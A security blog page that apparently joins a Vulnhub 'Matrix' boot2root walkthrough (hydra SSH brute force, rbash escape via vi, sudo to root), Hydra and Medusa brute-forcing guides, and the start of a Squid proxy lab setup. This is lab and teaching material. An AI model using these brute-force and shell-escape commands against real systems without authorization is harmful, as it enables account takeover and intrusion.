Channel: Hacking Articles|Raj Chandel's Blog

Matrix: 1 Vulnhub Walkthrough


Hello friends! Today we are going to take another boot2root challenge known as Matrix. The credit for making this VM goes to "Ajay Verma"; our goal is to get root access to complete the challenge. You can download this VM here.
Security Level: Intermediate
Flags: There is one flag (flag.txt).
Table of contents:
·         Port scanning and IP discovery.
·         Hitting on port 80
·         Hitting on port 31337 and finding base64 encoded string
·         Decode base64 encoded string
·         Finding and downloading Bin file
·         Decoding brainfuck encoded string
·         Creating dictionary using crunch
·         SSH login brute force using hydra
·         Finding rbash
·         Escaping restricted shell environment
·         Exporting environment variables
·         Getting root access.
·         Reading the flag.
Walkthrough
Let’s start off with scanning the network to find our target.
netdiscover
We found our target –> 192.168.1.18
Our next step is to scan our target with nmap.
The nmap output shows us that there are 3 ports open: 22 (SSH), 80 (HTTP) and 31337 (HTTP).
We find that port 80 is running http, so we open the IP in our browser.
We don’t find anything on the web service running on port 80. So we start enumerating the web service running on port 31337.
We take a look at the source code of the web service running on port 31337 and find a base64 encoded string.
We decode the base64 string and find a hint pointing to "Cypher.matrix".
We open “Cypher.matrix” on the web service running on port 31337 and find that it starts downloading a BIN file.
We take a look at the content of the file and find “brainfuck” encoded string.
We decode the brainfuck program using the site linked here and find an incomplete password for the user "guest".
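The decode above is done on a web site; the interpreter below lets you do the same check offline on the downloaded file. It is an added example and not code from the walkthrough; the Cypher.matrix payload itself is not reproduced here, so the SAMPLE program and the round-trip input are constructed.

```python
"""Brainfuck interpreter for checking the decode of the Cypher.matrix payload
offline. Added example, not code from the walkthrough; the .bin file itself is
not reproduced, the SAMPLE program below is constructed."""


def bracket_map(code):
    """Map every '[' to its matching ']' and back; raise on mismatch."""
    stack, pairs = [], {}
    for i, ch in enumerate(code):
        if ch == "[":
            stack.append(i)
        elif ch == "]":
            if not stack:
                raise ValueError(f"unmatched ']' at offset {i}")
            j = stack.pop()
            pairs[j], pairs[i] = i, j
    if stack:
        raise ValueError(f"unmatched '[' at offset {stack[-1]}")
    return pairs


def run_brainfuck(code, stdin=b"", max_steps=10_000_000):
    """Execute brainfuck `code` (8-bit wrapping cells, growing tape) and return
    the bytes it prints. Non-command characters are treated as comments."""
    code = "".join(ch for ch in code if ch in "<>+-.,[]")
    jumps = bracket_map(code)
    tape = bytearray(30000)
    ptr = pc = in_pos = 0
    out = bytearray()
    steps = 0
    while pc < len(code):
        steps += 1
        if steps > max_steps:
            raise RuntimeError("step limit hit; program may not terminate")
        op = code[pc]
        if op == ">":
            ptr += 1
            if ptr == len(tape):
                tape.extend(bytes(30000))
        elif op == "<":
            if ptr == 0:
                raise IndexError("pointer moved left of cell 0")
            ptr -= 1
        elif op == "+":
            tape[ptr] = (tape[ptr] + 1) & 0xFF
        elif op == "-":
            tape[ptr] = (tape[ptr] - 1) & 0xFF
        elif op == ".":
            out.append(tape[ptr])
        elif op == ",":
            tape[ptr] = stdin[in_pos] if in_pos < len(stdin) else 0
            in_pos += 1
        elif op == "[" and tape[ptr] == 0:
            pc = jumps[pc]
        elif op == "]" and tape[ptr] != 0:
            pc = jumps[pc]
        pc += 1
    return bytes(out)


def to_brainfuck(text):
    """Naive encoder (clear cell, N pluses, print) used to build round-trip input."""
    return "".join("[-]" + "+" * b + "." for b in text.encode())


# Constructed sample: 8*8 = 64, plus one = 65 -> prints "A".
SAMPLE = "++++++++[>++++++++<-]>+."

if __name__ == "__main__":
    print(run_brainfuck(SAMPLE).decode())
    print(run_brainfuck(to_brainfuck("guest:k1ll0r??")).decode())
```

To use it on the walkthrough's file, read the downloaded .bin from disk and pass its contents to run_brainfuck; the output is the same partial password the text describes.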
As the last two characters are missing, we create a wordlist with crunch: the pattern keeps the known prefix fixed, % stands for a digit and @ for a lowercase letter, giving 10*26 = 260 candidates to try against SSH.
crunch 8 8 -t k1ll0r%@ -o dict.txt
We use hydra to brute force the SSH login with that dictionary and find the password to be "k1ll0r7n".
hydra -l guest -P dict.txt 192.168.1.18 ssh
Now that we know the password, we log in through SSH with the credentials "guest:k1ll0r7n".
After logging in we try to run "ls" but it fails: the account has been given rbash, the restricted bash shell.
ls
We check the PATH environment variable. rbash refuses to run any command name containing a slash, so typing the expanded variable as a command makes it reveal the value in its error message: the path is /home/guest/prog.
$PATH
Since "ls" is unavailable, we try other commands and find that "echo" works. echo is a shell builtin and the glob is expanded by the shell itself, so we use it to list the executables inside /home/guest/prog and find that "vi" is available.
echo /home/guest/prog/*
Now we check SHELL environment variable and find we have only rbash shell.
echo $SHELL
We run vi and, from its command mode, spawn /bin/bash to escape the restricted shell. This works because the restriction applies to rbash itself and not to the programs it lets us start, and the vi here is the full editor rather than the restricted rvi (":set shell=/bin/bash" followed by ":shell" achieves the same).
:!/bin/bash
After escaping the restricted shell, the new bash still inherits the restricted environment, so we set SHELL to /bin/bash and add "/usr/bin" to PATH so that normal Linux commands resolve.
export SHELL=/bin/bash
export PATH=/usr/bin:$PATH
After setting the environment variables, we check the sudoers list and find that guest has full rights, so we can get a root shell directly.
sudo -l
sudo su
The "su" command is not found because it lives in /bin, which is not yet in PATH. We add "/bin" to PATH and run the command again, entering guest's password from earlier to become root.
export PATH=/bin:$PATH
sudo su
As root we go to /root and find a file called flag.txt. Its content is the congratulatory message.
cd /root
ls
cat flag.txt


Comprehensive Guide on Hydra - A Brute Forcing Tool

Hello friends!! Today we are going to discuss how effective Hydra is at cracking the login credentials of various protocols to gain unauthorized access to a system remotely. In this article we cover each option available in Hydra for brute-force attacks in different scenarios.

Table of Content
§  Introduction to hydra
§  Multiple Feature of Hydra
§  Password Guessing For Specific Username
§  Username Guessing For Specific Password
§  Cracking Login Credential
§  Use Verbose or Debug Mode for Examining Brute Force
§  NULL/Same as Login/Reverse login Attempt
§  Save Output to Disk
§  Resuming The Brute Force Attack
§  Password Generating Using Various Set of Character
§  Attacking on Specific Port Instead of Default
§  Making Brute Force Attack on Multiple Host

Introduction to Hydra
Hydra is a parallelized login cracker which supports numerous protocols to attack. It is very fast and flexible, and new modules are easy to add. This tool makes it possible for researchers and security consultants to show how easy it would be to gain unauthorized access to a system remotely.

It supports: Cisco AAA, Cisco auth, Cisco enable, CVS, FTP, HTTP(S)-FORM-GET, HTTP(S)-FORM-POST, HTTP(S)-GET, HTTP(S)-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MySQL, NNTP, Oracle Listener, Oracle SID, PC-Anywhere, PC-NFS, POP3, PostgreSQL, RDP, Rexec, Rlogin, Rsh, SIP, SMB(NT), SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.

Multiple Feature of Hydra
We are using the GNOME build of Kali Linux, where the "thc-hydra" package is installed by default, so all we need to do is open a terminal, type "hydra -h" and press Enter. You will be welcomed by its help screen.
-R : restore a previous aborted/crashed session
-I : ignore an existing restore file.
-S : perform an SSL connect
-s PORT : if the service is on a different default port, define it here
-l LOGIN or -L FILE : login with LOGIN name, or load several logins from FILE
-p PASS or -P FILE : try password PASS, or load several passwords from FILE
-x MIN:MAX:CHARSET : password bruteforce generation, type "-x -h" to get help
-e nsr : try "n" null password, "s" login as pass and/or "r" reversed login
-u : loop around users, not passwords (effective! implied with -x)
-C FILE : colon separated "login:pass" format, instead of -L/-P options
-M FILE : list of servers to be attacked in parallel, one entry per line
-o FILE : write found login/password pairs to FILE instead of stdout
-f / -F : exit when a login/pass pair is found (-M: -f per host, -F global)
-t TASKS : run TASKS number of connects in parallel (per host, default: 16)
-w / -W TIME : wait time for responses (32s) / between connects per thread
-4 / -6 : prefer IPv4 (default) or IPv6 addresses
-v / -V / -d : verbose mode / show login+pass for each attempt / debug mode
-U : service module usage details
server : the target server (use either this OR the -M option)
service : the service to crack (see below for supported protocols)
OPT : some service modules support additional input (-U for module help)
Reference Source:https://tools.kali.org/password-attacks/hydra

Password Guessing For Specific Username
Hydra is a very effective tool and also quite easy to use for brute forcing any supported protocol.
Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-SuvV46] [service://server[:PORT][/OPT]]
Suppose you already know the username for an FTP (or any other) login and only want to guess the password from a dictionary.
In that case use the following command, where -l sets the username and -P the dictionary of passwords.
hydra -l raj -P pass.txt 192.168.1.108 ftp
As you can observe it has found 1 valid password: 123 for username: raj for FTP login.
Username Guessing For Specific Password
Suppose you already know the password for an FTP (or any other) login and only want to guess the username from a dictionary, the reverse of the situation above.
In that case use the following command, where -L sets the dictionary of usernames and -p the password.
hydra -L user.txt -p 123 192.168.1.108 ftp
As you can observe it has found 1 valid username: raj for password: 123 FTP login.


Cracking Login Credential
Suppose you know neither the username nor the password for an FTP (or any other) login and want to guess the valid combination from two dictionaries.
In that case use the following command, where -L sets the dictionary of usernames and -P the dictionary of passwords.
hydra -L user.txt -P pass.txt 192.168.1.108 ftp
As you can observe it has found 1 valid username: raj for password: 123 FTP login.


Use Verbose or Debug Mode for Examining Brute Force
You can add -V to any command; in verbose mode you see each username/password combination as it is tried. In the image below there are 5 usernames in user.txt (L=5) and 5 passwords in pass.txt (P=5), so the total number of login attempts is 5*5=25.


You can also use -d, which enables debug output on top of verbose mode and shows the full detail of the attack.
As you can observe, verbose mode lists each attempt made from user.txt and pass.txt, while debug mode additionally shows waittime, conwait, socket, send pid and received pid.

NULL/Same as Login/Reverse login Attempt
Using -e with nsr enables three extra tries per login while brute forcing the password field: a null (empty) password, the login name itself and the reversed login name. In the image below L=5 and P=8 (the 5 dictionary entries plus the 3 extras), so the total number of login tries is 5*8=40.
hydra -L user.txt -P pass.txt 192.168.1.108 ftp -V -e nsr
As you can observe with every username, it is trying to match the following combination along with the password list.
Login “root” and pass “” as null password
Login “root” and pass “root” as same as login
Login “root” and pass “toor” as reverse of login


Save Output to Disk
For record keeping, readability and later reference, we save the output of the Hydra attack to a file with the -o parameter.
hydra -L user.txt -P pass.txt 192.168.1.108 ftp -o result.txt
Once the command has finished, we check the file to confirm the output was saved; in this case it is /root/result.txt.


Resuming the Brute Force Attack
Sometimes a brute-force run is paused, halted or cancelled accidentally. To save time you can use -R, which reads the restore file Hydra writes and continues from the last attempt instead of starting again from the first one.
hydra -L user.txt -P pass.txt 192.168.1.108 ftp
hydra -R
As the image below shows, pressing Ctrl+C stops the attack; typing hydra -R afterwards resumes it.
Password Generating Using Various Set of Character
Hydra has a -x option that generates passwords instead of reading them from a file:
-x MIN:MAX:CHARSET
MIN is the minimum number of characters in the password
MAX is the maximum number of characters in the password
CHARSET specifies the characters to use: 'a' for lowercase letters, 'A' for uppercase letters, '1' for digits; any other character is used literally.
-y disables the use of the letters above as placeholders, so a, A and 1 are then literal characters.
Suppose the password is 123. Setting MIN=1, MAX=3 and CHARSET 1 generates every numeric string of one to three digits for the given username:
hydra -l shubham -x 1:3:1 ftp://192.168.1.108
or
hydra -l raj -x 1:3:1 192.168.1.108 ftp
As you can observe it has found 1 valid password: 123 for username: raj for the FTP login.
With -y the letters a, A and 1 in CHARSET lose their placeholder meaning, so the following variant tries only the literal strings 1, 11 and 111:
hydra -l raj -x 1:3:1 192.168.1.108 ftp -y

Similarly, to try lowercase passwords of one to three characters, set CHARSET to a:
hydra -l shubham -x 1:3:a ftp://192.168.1.108 -V

As you can observe it has found 1 valid password: abc for username: shubham for the FTP login.
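The generation rules described in this section, the -e nsr extras above and the crunch -t pattern used in the Matrix walkthrough at the top of this page, modelled in Python so you can check a keyspace size before launching an attack. This is an added example, not crunch's or hydra's own code; the symbol set behind crunch's ^ placeholder is an assumption, the other rules follow the option descriptions quoted above.

```python
"""Model of the candidate-generation rules used on this page: crunch -t
placeholders (@ , % ^) from the Matrix walkthrough, hydra -x MIN:MAX:CHARSET
with and without -y, and the extra tries added by hydra -e nsr. Added example,
not crunch's or hydra's own code. The symbol set behind crunch's ^ is an
assumption; the other rules follow the option descriptions quoted above."""
import itertools
import string

# crunch -t placeholders; any other character in the pattern is literal.
CRUNCH_PLACEHOLDERS = {
    "@": string.ascii_lowercase,
    ",": string.ascii_uppercase,
    "%": string.digits,
    "^": "!@#$%^&*()-_+=",   # assumed default symbol set; check `man crunch`
}


def crunch_pattern(pattern, placeholders=CRUNCH_PLACEHOLDERS):
    """Yield every string matching a crunch -t pattern, e.g. k1ll0r%@."""
    slots = [placeholders.get(ch, ch) for ch in pattern]
    for combo in itertools.product(*slots):
        yield "".join(combo)


def parse_hydra_x(spec, literal=False):
    """Parse hydra's -x MIN:MAX:CHARSET into (min, max, charset). With
    literal=True (hydra -y) the letters a, A and 1 are plain characters rather
    than the lowercase/uppercase/digit classes."""
    lo, hi, charset = spec.split(":", 2)
    lo, hi = int(lo), int(hi)
    if lo < 1 or hi < lo:
        raise ValueError(f"bad length range in {spec!r}")
    classes = {"a": string.ascii_lowercase, "A": string.ascii_uppercase, "1": string.digits}
    chars = []
    for ch in charset:
        for c in (ch if literal else classes.get(ch, ch)):
            if c not in chars:              # keep order, drop duplicates
                chars.append(c)
    return lo, hi, "".join(chars)


def hydra_x(spec, literal=False):
    """Yield every candidate hydra -x would try, shortest length first."""
    lo, hi, chars = parse_hydra_x(spec, literal)
    for length in range(lo, hi + 1):
        for combo in itertools.product(chars, repeat=length):
            yield "".join(combo)


def keyspace_size(spec, literal=False):
    """Number of candidates without materialising them."""
    lo, hi, chars = parse_hydra_x(spec, literal)
    return sum(len(chars) ** n for n in range(lo, hi + 1))


def with_extras(login, passwords, nsr=""):
    """Password list for one login after -e n/s/r: empty password, the login
    itself, the reversed login, then the dictionary."""
    extras = []
    if "n" in nsr:
        extras.append("")
    if "s" in nsr:
        extras.append(login)
    if "r" in nsr:
        extras.append(login[::-1])
    return extras + list(passwords)


def attempt_count(logins, passwords, nsr=""):
    """Total login tries, i.e. hydra's L x P figure."""
    return sum(len(with_extras(login, passwords, nsr)) for login in logins)


if __name__ == "__main__":
    print(len(list(crunch_pattern("k1ll0r%@"))), "candidates for k1ll0r%@")
    print(keyspace_size("1:3:1"), "candidates for -x 1:3:1")
    print(list(hydra_x("1:3:1", literal=True)), "with -y")
    print(attempt_count(["root"] * 5, ["pass"] * 5, "nsr"), "tries for L=5, P=5, -e nsr")
```

keyspace_size is the number worth looking at first: -x 1:3:1 is 1110 tries, but -x 1:3:a is already 18278 and each extra position multiplies by the charset size, so against a lockout policy a generated keyspace is rarely affordable beyond a few characters.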

Attacking on Specific Port Instead of Default
For security reasons an administrator may move a service to a non-standard port. Hydra attacks the default port of a service; in all of the attacks above it automatically targeted port 21 for FTP.
The -s option sets the port so that the attack is launched against it instead of the default.
Suppose that on scanning the target I found FTP running on port 2121 instead of 21; the command for the FTP login attack becomes:
hydra -L user.txt -P pass.txt 192.168.1.108 ftp -s 2121
As you can observe it has found 1 valid password: 123 for username: raj for FTP login.


Making Brute Force Attack on Multiple Host
To run the same user/password dictionaries against several hosts in a network, use -M with a file of targets: Hydra makes the same number of login attempts on every host IP in the list.
Here I saved two host IPs in a text file and used the following command to brute force both hosts with the same dictionary.

hydra -L user.txt -P pass.txt -M hosts.txt ftp
As you can observe it has found valid FTP logins on both hosts.

If you have a list of targets and want the attack to stop as soon as a valid login is found on any of them, use -F, which finishes the whole run on the first hit across the host list.
hydra -L user.txt -P pass.txt -M hosts.txt ftp -V -F
As you can observe it has found 1 valid FTP login for 192.168.1.108 and finished the attack.


Disclaimer by Hydra - Please do not use in military or secret service organizations, or for illegal purposes.

Comprehensive Guide on Medusa - A Brute Forcing Tool


Hello friends!! Today we are going to discuss how effective Medusa is at cracking the login credentials of various protocols to gain unauthorized access to a system remotely. In this article we cover each option available in Medusa for brute-force attacks in different scenarios.

Table OF Content
Introduction to Medusa and its features
Password Cracking For Specific Username
Username Cracking for Specific Password
Cracking Login Credential
Making Brute Force Attack on Multiple Host
Attacking on Specific Port Instead of Default
NULL/Same as Login Attempt
Save logs to Disk
Stop on Success
Suppress Startup Banner
Verbose Mode
Error Debugging Mode
Using Combo Entries
Resuming the Brute Force Attack


Introduction to Medusa and its features

Medusa is a speedy, parallel, and modular, login brute-forcer. The goal is to support as many services which allow remote authentication as possible. The author considers following items as some of the key features of this application:

§  Thread-based parallel testing. Brute-force testing can be performed against multiple hosts, users or passwords concurrently.
§  Flexible user input. Target information (host/user/password) can be specified in a variety of ways. For example, each item can be either a single entry or a file containing multiple entries. Additionally, a combination file format allows the user to refine their target listing.
§  Modular design. Each service module exists as an independent .mod file. This means that no modifications are necessary to the core application in order to extend the supported list of services for brute-forcing.
§  Multiple protocols supported. Many services are currently supported (e.g. SMB,  HTTP, POP3,  MS-SQL, SSHv2, among others)
Reference Source: http://www.foofus.net
Type "medusa" in the terminal without any options and it lists all the options it accepts along with a description of each.
Syntax: medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT]

-h [TEXT] : Target hostname or IP address
-H [FILE] : File containing target hostnames or IP addresses
-u [TEXT] : Username to test
-U [FILE] : File containing usernames to test
-p [TEXT] : Password to test
-P [FILE] : File containing passwords to test
-C [FILE] : File containing combo entries. See README for more information.
-O [FILE] : File to append log information to
-e [n/s/ns] : Additional password checks ([n] No Password, [s] Password = Username)
-M [TEXT] : Name of the module to execute (without the .mod extension)
-m [TEXT] : Parameter to pass to the module. This can be passed multiple times with a different parameter each time and they will all be sent to the module (i.e. -m Param1 -m Param2, etc.)
-d : Dump all known modules
-n [NUM] : Use for non-default TCP port number
-s : Enable SSL
-g [NUM] : Give up after trying to connect for NUM seconds (default 3)
-r [NUM] : Sleep NUM seconds between retry attempts (default 3)
-R [NUM] : Attempt NUM retries before giving up. The total number of attempts will be NUM + 1.
-c [NUM] : Time to wait in usec to verify socket is available (default 500 usec).
-t [NUM] : Total number of logins to be tested concurrently
-T [NUM] : Total number of hosts to be tested concurrently
-L : Parallelize logins using one username per thread. The default is to process the entire username before proceeding.
-f : Stop scanning host after first valid username/password found.
-F : Stop audit after first valid username/password found on any host.
-b : Suppress startup banner
-q : Display module's usage information
-v [NUM] : Verbose level [0 - 6 (more)]
-w [NUM] : Error debug level [0 - 10 (more)]
-V : Display version
-Z [TEXT] : Resume scan based on map of previous scan



As said above, Medusa is modular; use the -d option to list all the modules it contains.

Password Cracking For Specific Username
Medusa is a very effective tool and also quite easy to use for brute forcing any supported protocol.

Assume you already know the username for an FTP (or any other) login and only want to guess the password from a dictionary.
In that case use the following command, where -u sets the username and -P the dictionary of passwords.
medusa -h 192.168.1.108 -u raj -P pass.txt -M ftp
As you can observe it has found 1 valid password: 123 for username: raj for FTP login.


Username Cracking for Specific Password
Assume you already know the password for an FTP (or any other) login and only want to guess the username from a dictionary, the reverse of the situation above.
In that case use the following command, where -U sets the dictionary of usernames and -p the password.
medusa -h 192.168.1.108 -U user.txt -p 123 -M ftp
As you can observe it has found 1 valid username: raj for password: 123 FTP login.


Cracking Login Credential
Suppose you know neither the username nor the password for an FTP (or any other) login and want to guess the valid combination from two dictionaries.
In that case use the following command, where -U sets the dictionary of usernames and -P the dictionary of passwords.
medusa -h 192.168.1.108 -U user.txt -P pass.txt -M ftp
As you can observe it has found 1 valid username: raj for password: 123 FTP login.



Making Brute Force Attack on Multiple Host
To run the same user/password dictionaries against several hosts in a network, use -H with a file of targets: Medusa makes the same number of login attempts on every host IP in the list.
Here I saved two host IPs in a text file and used the following command to brute force both hosts with the same dictionary.

medusa -H hosts.txt -U user.txt -P pass.txt -M ftp
As you can observe it has found valid FTP logins on both hosts.


If your host list contains several IPs and you want only a certain number of them attacked at a time, use -T to set how many hosts are tested concurrently.

medusa -H hosts.txt -U user.txt -P pass.txt -M ftp -T 1
medusa -H hosts.txt -U user.txt -P pass.txt -M ftp -T 2

As the output below shows, the 1st command attacks a single host IP at a time whereas the 2nd attacks two host IPs simultaneously.


Attacking on Specific Port Instead of Default
For security reasons an administrator may move a service to a non-standard port. Medusa attacks the default port of a service; in all of the attacks above it automatically targeted port 21 for FTP.
The -n option sets the port so that the attack is launched against it instead of the default.
Suppose that on scanning the target I found SSH running on port 2222 instead of 22; I execute the following commands for the SSH login attack.
medusa -h 192.168.1.108 -U user.txt -P pass.txt -M ssh
medusa -h 192.168.1.108 -U user.txt -P pass.txt -M ssh -n 2222
As you can observe, the 1st command failed to connect because port 22 was closed, while the 2nd found 1 valid password: 123 for username: raj for SSH login on port 2222.


NULL/Same as Login Attempt
Using -e with ns enables two extra checks while brute forcing the password field: a null (empty) password and the username as the password.
medusa -h 192.168.1.108 -u raj -P pass.txt -M ftp -e ns
As you can observe with every username, it is trying to match the following combination along with the password list.
User “raj” and password “” as null password
User “raj” and password “raj” as same as login




Save logs to Disk
For record keeping, readability and later reference, we save the output of the Medusa attack to a file with the -O parameter (upper case; Medusa has no -o option).
medusa -h 192.168.1.108 -U user.txt -P pass.txt -M ftp -O log.txt
Once the command has finished, we check the file to confirm the output was saved; in this case it is /root/log.txt.



Stop on Success 

Suppose that while using a host list you want to stop attacking a host as soon as its first valid username/password is found; add the -f option to the command.

medusa -h 192.168.1.108 -U user.txt -P pass.txt -M ftp -f


You can also use -F to stop the whole audit after the first valid username/password is found on any host.
medusa -H hosts.txt -U user.txt -P pass.txt -M ftp -F


Suppress Startup Banner
If you want to hide the Medusa banner during the attack, use -b to suppress it.
medusa -H hosts.txt -U user.txt -P pass.txt -M ftp -b

Verbose Mode

Verbose mode has six levels for examining the details of the attack, and error debugging has ten. Use -v for the verbose level and -w for the error debug level.
medusa -H hosts.txt -U user.txt -P pass.txt -M ftp -v 1
medusa -H hosts.txt -U user.txt -P pass.txt -M ftp -v 2
medusa -H hosts.txt -U user.txt -P pass.txt -M ftp -v 6



Error Debugging Mode

As said above, the error debug levels run from 0 to 10. In practice the output at levels 0-6 is roughly the same with small differences, and levels 7-10 are roughly the same as each other but noticeably more detailed than 0-6.


medusa -h 192.168.1.108 -U user.txt -P pass.txt -M ftp -w 01
medusa -h 192.168.1.108 -U user.txt -P pass.txt -M ftp -w 06
medusa -h 192.168.1.108 -U user.txt -P pass.txt -M ftp -w 07

Debug mode is showing waittime, socket, send data size and received data size, module detail and path.


Using Combo Entries

The -C option enables a combo file: one record per line, with colon-separated fields in the format host:username:password. If any of the three fields is left blank, that value must be supplied globally on the command line, either as a single value or as a file.

The following combinations are possible in the combo file:

    host:username:password
    host:username:
    host::
    :username:password
    :username:
    ::password
    host::password
As you can observe in the image below, userpass.txt is our combo file and we pass it with -C to launch the attack.

medusa -M ftp -C userpass.txt
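The field combinations listed above, worked through as a parser that expands a combo file into the (host, username, password) triples Medusa would try, blank fields being filled from the global -h/-H, -u/-U and -p/-P values. This is an added example and not Medusa's code; the USERPASS file below is constructed, and the decision to split on only the first two colons is this parser's choice.

```python
"""Expander for the medusa combo-file format described above (-C): one
host:username:password record per line, where an empty field is filled from
the global values given with -h/-H, -u/-U and -p/-P. Added example, not
medusa's code; the USERPASS file below is constructed."""
import itertools


def parse_combo_line(line):
    """Split one record into (host, user, password); empty fields become None.
    Splits on the first two colons only, so a password may itself contain ':'
    (this parser's choice; check medusa's README for the tool's own rule)."""
    fields = line.rstrip("\r\n").split(":", 2)
    if len(fields) != 3:
        raise ValueError(f"expected host:username:password, got {line!r}")
    return tuple(f if f else None for f in fields)


def expand_combo(lines, hosts=(), users=(), passwords=()):
    """Yield (host, user, password) triples in file order. A blank field takes
    every value from the matching global list; a blank field with no global
    values is an error rather than a silently skipped record."""
    pools = {"host": list(hosts), "username": list(users), "password": list(passwords)}
    for n, raw in enumerate(lines, 1):
        if not raw.strip() or raw.lstrip().startswith("#"):
            continue
        record = parse_combo_line(raw)
        choices = []
        for name, fixed in zip(pools, record):
            values = [fixed] if fixed is not None else pools[name]
            if not values:
                raise ValueError(f"line {n}: empty {name} field and no global {name} supplied")
            choices.append(values)
        yield from itertools.product(*choices)


# Constructed combo file exercising every field combination listed above.
USERPASS = """\
192.168.1.108:raj:123
192.168.1.108:raj:
192.168.1.108::
:raj:123
:raj:
::123
192.168.1.108::123
"""


def attempts(combo_text, **globals_):
    """Materialise the attempt list for a combo file given as text."""
    return list(expand_combo(combo_text.splitlines(), **globals_))


if __name__ == "__main__":
    rows = attempts(USERPASS, hosts=["10.0.0.1"], users=["raj", "aarti"], passwords=["123", "toor"])
    for host, user, pw in rows:
        print(f"{host}\t{user}\t{pw}")
    print(len(rows), "attempts")
```

Counting the expanded rows before running Medusa is the practical use: a combo file with many blank fields multiplies by every global list, and the total is what a lockout policy on the target will see.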


Resuming the Brute Force Attack
Sometimes a brute-force run is paused, halted or cancelled accidentally. To save time you can use -Z with the resume map Medusa prints on exit, which continues from the last attempt instead of starting again from the first one.
medusa -h 192.168.1.108 -U user.txt -P pass.txt -M ftp

As the output below shows, after pressing Ctrl+C Medusa stops and prints the text to add to your original command; add the highlighted part to resume the attack.
medusa -h 192.168.1.108 -U user.txt -P pass.txt -M ftp -Z h1u2u3.

Repeat the same step and compare the results of all three commands: each run continues the brute force from the last attempt of the previous one.
medusa -h 192.168.1.108 -U user.txt -P pass.txt -M ftp -Z h1u3u4.


Web Proxy Penetration Lab Setup Testing using Squid


In this article we set up Squid as a proxy server on an Ubuntu/Debian machine and then test the web application behind it through the proxy.

Table of content
§  Introduction to Proxy Setting
§  Squid Proxy Installation
§  Squid Proxy Server Configuration
§  Configuring Apache service for Web Proxy
§  Set-up Manual Proxy in the Browser
§  Directory Brute force Attack on Proxy Server Using DIRB Tool
§  Vulnerability Scanning on Proxy Server Using Nikto Tool
§  SQL Injection on Proxy Server Using Sqlmap Tool
§  WordPress Scanning on Proxy Server Using WPScan Tool

Introduction to Proxy Setting
A proxy is a computer system or program that sits between your web browser and another computer as a middle-man. Your ISP operates servers, computers designed to deliver information to other computers, and uses proxy servers to speed up the transfer of information between those servers and your computer.

For example: when user A has already fetched a page and user B requests the same page, the proxy serves its "stored or cached" copy to B instead of retrieving it from the origin server again.

Squid Proxy Installation

Squid is a caching web proxy which offers proxy and cache services for HTTP, FTP and other common network protocols, including proxying of Secure Sockets Layer (SSL) requests and caching of Domain Name System (DNS) lookups, and it can run as a transparent cache. It also supports a wide variety of cache-coordination protocols.

Open the hosts file on your local machine and add the loopback address with the machine's hostname, because by default squid3 looks up the hostname (Ubuntu here) when it starts.


Now install squid3 from the apt repository:
apt-get install squid3
Squid Proxy Server Configuration

Once the installation has completed, open the configuration file at /etc/squid3/squid.conf.
With Squid's access control you can restrict use of the proxy to clients with specific IP addresses.
Suppose you want to grant access only to users of the 192.168.1.0/24 subnet; add the following line to the ACL section of squid.conf:
acl lan src 192.168.1.0/24


Now allow those clients to use the proxy for HTTP:
http_access allow lan
To make Squid listen on the default TCP port 3128, set the http_port directive:
http_port 3128
Then add the following rules after http_port so that Squid strips these request headers before forwarding:
request_header_access Referer deny all
request_header_access X-Forwarded-For deny all
request_header_access Via deny all
request_header_access Cache-Control deny all

You can set forwarded_for to on|off|transparent|truncate|delete:
1. on: Squid appends the client's IP address to the HTTP requests it forwards; by default it looks like X-Forwarded-For: 192.1.2.3
2. off: the header appears as X-Forwarded-For: unknown
3. transparent: Squid does not alter the X-Forwarded-For header in any way.
4. delete: Squid deletes the entire X-Forwarded-For header.
5. truncate: Squid will remove all existing




Here we set forwarded_for off, save the file and restart Squid:
sudo service squid3 restart
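The acl and http_access lines above are the part of this setup that decides who may use the proxy, and Squid's rule for clients that match nothing is easy to get wrong. The following is an added Python model of that evaluation (not Squid's code, and it only understands `acl NAME src CIDR...` and `http_access allow|deny NAME [!NAME ...]`); the LAB_CONF fragment mirrors the lines added above, the other two fragments are constructed.

```python
"""Simplified model of how Squid evaluates the acl/http_access lines set up
above: acl names map to source networks, http_access rules are tried in order,
first match wins, and if nothing matches the result is the opposite of the last
rule. Added example, not Squid's own code; only `acl NAME src CIDR...` and
`http_access allow|deny NAME [!NAME ...]` are understood, other directives are skipped."""
import ipaddress


def parse_squid_conf(text):
    acls, rules = {}, []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        if parts[0] == "acl" and len(parts) >= 4 and parts[2] == "src":
            nets = [ipaddress.ip_network(p, strict=False) for p in parts[3:]]
            acls.setdefault(parts[1], []).extend(nets)
        elif parts[0] == "http_access" and len(parts) >= 3:
            if parts[1] not in ("allow", "deny"):
                raise ValueError(f"bad http_access line: {line}")
            rules.append((parts[1], parts[2:]))
        # http_port, request_header_access, forwarded_for ... are not modelled
    return acls, rules


def acl_matches(acls, name, client):
    """Evaluate one acl reference, honouring the '!' negation prefix.
    'all' is Squid's built-in acl matching every client."""
    negate = name.startswith("!")
    name = name.lstrip("!")
    if name == "all":
        hit = True
    elif name in acls:
        hit = any(client in net for net in acls[name])
    else:
        raise KeyError(f"acl {name!r} referenced before definition")
    return hit != negate


def http_access(acls, rules, client_ip):
    """Return 'allow' or 'deny' for a client address."""
    client = ipaddress.ip_address(client_ip)
    for action, names in rules:
        if all(acl_matches(acls, n, client) for n in names):
            return action
    if not rules:
        return "deny"          # no http_access lines at all: Squid denies
    return "deny" if rules[-1][0] == "allow" else "allow"


# Constructed fragments. LAB_CONF mirrors the lines added to squid.conf above.
LAB_CONF = """
acl lan src 192.168.1.0/24
http_access allow lan
http_port 3128
"""
# A deny-only list: clients matching nothing fall through to the default,
# which is 'allow' because the last rule is a deny.
LOOSE_CONF = """
acl blocked src 10.0.0.0/8
http_access deny blocked
"""
TIGHT_CONF = LOOSE_CONF + "http_access deny all\n"


def decide(conf, client_ip):
    acls, rules = parse_squid_conf(conf)
    return http_access(acls, rules, client_ip)


if __name__ == "__main__":
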